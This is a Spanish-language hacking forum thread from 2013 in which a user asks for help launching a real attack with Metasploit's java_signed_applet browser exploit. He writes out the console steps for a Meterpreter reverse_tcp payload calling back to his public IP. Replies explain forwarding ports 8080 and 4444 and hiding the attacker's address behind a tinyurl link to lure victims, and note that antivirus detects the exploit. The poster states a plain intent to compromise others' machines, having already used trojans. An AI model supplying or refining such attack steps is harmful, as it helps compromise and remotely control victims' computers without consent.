metasploit DUDA ataque real !

Iniciado por Socket, 14 Septiembre 2013, 13:58 PM

0 Miembros y 2 Visitantes están viendo este tema.

Socket

buenas bros queria saber sobre este bug java_apllets es como un payload que ataka via internet mediante metasploit pero no lo entiendo ???????????

preguntas del video ?

primero abre los puertos 4444 y 8080
por que abre el puerto 8080 ese puerto no es para proxys o para servidores ?

otra cosa la victima tiene que tener instalado JAVA para que funke el ataque ?

y no entiendo para que sirve este website para crear un servidor ?
http://tinyurl.com/create.php
segun el video pone la ip publica .. como LHOST

cuando lo abro en otra maquina sale asi y no me da session a de cuenta que la web no me diera respuesta o
httt://tinyurl.com/194.123.77.33:8080/ me sale asi en la maquina atacada



ya intente con troyanos y me fue bien quiero hacer esto alguien quien me pueda ayudar hacer el ataque por favor

[youtube=640,360]TbeAMnscYtg[/youtube]


pasos del ataque :

use exploit/multi/browser/java_signed_applet

show options

set SRVHOST 192.168.1.9

set URIPATH /

set PAYLOAD windows/meterpreter/reverse_tcp

show options

set LHOST 194.123.77.33 IP PUBLICA


exploit

Shell Root

Creo que bug java_applet es el exploit, payload es otra cosa.
tinyurl.com, es una pagina acortadora de links
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

xustyx

Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.

Socket

Cita de: xustyx en 14 Septiembre 2013, 19:29 PM
Primero de todo lo que hace es meter un server local, luego si usas router rediriges los puertos de la shell y el server (8080, 4444) a tu ip interna, luego cojes tu ip externa la pasas por tiny url o por dodnde quieras y ya esta, pero dudo que te funcione así por las buenas, mucho firewall y antivirus hay.

Espera por que dices que el firewall y el antivirus ? como en el video si sale bro explicame eso sabes de algun ataque real con reverse shell o payload algo parecido ?

xustyx

Acabo de probarla en red local y el avast salta con el exploit (se veia venir...). Al del video le debe salir porque el que infecta seguramente no tenga antivirus ni nada por el estilo.

beholdthe

Normal que salte el antivirus. Tendría narices que no saltara con ese exploit.

Socket

en serio salta el antivurus o no salta ?

beholdthe

Cita de: Socket en 17 Septiembre 2013, 15:36 PM
en serio salta el antivurus o no salta ?
En Metasploit eres bastante nuevo ¿verdad?
Deberías leer algo mas sobre como funciona y como es. En este foro hay mucha información sobre el tema. Estoy seguro que cuando leas algo mas, evitaras hacer este tipo de preguntas TAN OBVIAS.

MK-Ultra

Ultimamente el foro esta lleno de lamers...
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

Tyrz

y de gente que borde que parece responder con asco, hay formas y formas
Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en  Surf